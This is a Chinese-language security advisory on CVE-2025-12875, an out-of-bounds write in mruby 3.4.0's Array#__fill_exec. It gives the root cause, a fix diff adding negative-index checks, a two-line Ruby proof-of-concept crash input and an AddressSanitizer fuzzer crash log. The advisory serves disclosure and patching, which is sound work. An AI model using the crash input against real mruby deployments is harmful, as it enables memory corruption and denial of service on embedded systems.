mruby中的越界写入漏洞CVE-2025-12875
mruby(Micro Ruby)是由 Ruby 语言创始人松本行弘(Matz)主导、Ruby 核心团队开发的,轻量级、可嵌入式、可定制的Ruby 解释器。
一、基本情况
mruby(Micro Ruby)核心定位是将 Ruby 语言简洁性和易用性带入资源受限场景(如嵌入式设备、物联网、嵌入式脚本、轻量级应用)。
区别于标准 Ruby(CRuby/MRI)的 “全功能” 设计,mruby 以小巧、可定制、可嵌入为核心目标,适配资源受限环境(低内存、低算力)。
栋科技离开的关注到mruby受影响版本中存在一个越界写入漏洞,该漏洞现在已经被追踪为CVE-2025-12875,漏洞CVSS 4.0评分为4.8。
二、漏洞分析
CVE-2025-12875漏洞是在mruby v3.4.0中发现了一个漏洞,这是一个存在于mruby的函数名称为array.c ary_fill_exec中的越界写入漏洞。
当start为负时,指针下溢:__fill_exec不验证start<0,因此ptr=ARY_ptr(ARY)+start下溢且ptr[i]在数组边界之前写入(第945-947行)。
mrbgems/mruby-array-ext/src/array.c
@@ -956,6 +956,13 @@ ary_fill_exec(mrb_state *mrb, mrb_value self)
mrb_get_args(mrb, "iio", &start, &length, &obj);
if (start < 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "negative start index");
}
if (length < 0) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "negative length");
}
struct RArray *ary = mrb_ary_ptr(self);
mrb_int ary_len = ARY_LEN(ary);该漏洞影响了文件mrbgems/mruby-array-ext/src/array.c中的ary_fill_exec函数,对参数start/length进行操作可能会导致越界写入。
该漏洞被触发条件是在传递给mrb_load_string的Ruby代码中,使用负开始和正长度调用Array#__fill_exec。
对参数start/length进行操作可能会导致越界写入,该漏洞的利用方法已经公开,可能会被利用。
三、POC概念验证
1、Crashing input:
a = Array.new(20,0)
a.__fill_exec(-30,10,nil)2、Crash output:
+ FUZZER=mruby_fuzzer
+ shift
+ '[' '!' -v TESTCASE ']'
+ TESTCASE=/testcase
+ '[' '!' -f /testcase ']'
+ export RUN_FUZZER_MODE=interactive
+ RUN_FUZZER_MODE=interactive
+ export FUZZING_ENGINE=libfuzzer
+ FUZZING_ENGINE=libfuzzer
+ export SKIP_SEED_CORPUS=1
+ SKIP_SEED_CORPUS=1
+ run_fuzzer mruby_fuzzer /testcase
sysctl: setting key "vm.mmap_rnd_bits", ignoring: Read-only file system
Dictionary: 102 entries
/out/mruby_fuzzer: Running 1 inputs 1 time(s) each.
Running: /testcase
AddressSanitizer:DEADLYSIGNAL
=================================================================
==43==ERROR: AddressSanitizer: SEGV on unknown address 0x510fffffff50 (pc 0x7f377e9bac1a bp 0x7fff8f12ceb0 sp 0x7fff8f12c668 T0)
==43==The signal is caused by a WRITE memory access.
SCARINESS: 30 (wild-addr-write)
Stack Frame #0 /build/glibc-B3wQXB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:314
Stack Frame #1 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:63:3
Stack Frame #2 in ary_fill_exec array.c
Stack Frame #3 in mrb_vm_exec (/out/mruby_fuzzer+0x2e9297)
Stack Frame #4 in mrb_vm_run (/out/mruby_fuzzer+0x2d18e2)
Stack Frame #5 in mrb_top_run (/out/mruby_fuzzer+0x32d589)
Stack Frame #6 in mrb_load_exec (/out/mruby_fuzzer+0x3c61c5)
Stack Frame #7 in mrb_load_nstring_cxt (/out/mruby_fuzzer+0x3c712c)
Stack Frame #8 in mrb_load_string_cxt (/out/mruby_fuzzer+0x3c7260)
Stack Frame #9 in mrb_load_string (/out/mruby_fuzzer+0x3c72d8)
Stack Frame #10 in LLVMFuzzerTestOneInput (/out/mruby_fuzzer+0x2a7c5b)
Stack Frame #11 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:614:13
Stack Frame #12 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:327:6
Stack Frame #13 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:862:9
Stack Frame #14 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10
Stack Frame #15 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16
Stack Frame #16 in _start (/out/mruby_fuzzer+0x13fb0d)
DEDUP_TOKEN: __asan_memcpy--ary_fill_exec--mrb_vm_exec--mrb_vm_run
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-B3wQXB/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:314
==43==ABORTING
/out/mruby_fuzzer -rss_limit_mb=2560 -timeout=25 /testcase -dict=mruby.dict -only_ascii=1 < /dev/null3、Patch:
管理员已设置登录后刷新可查看四、影响范围
mruby <= 3.4.0
五、修复建议
mruby > 3.4.0
六、参考链接
管理员已设置登录后刷新可查看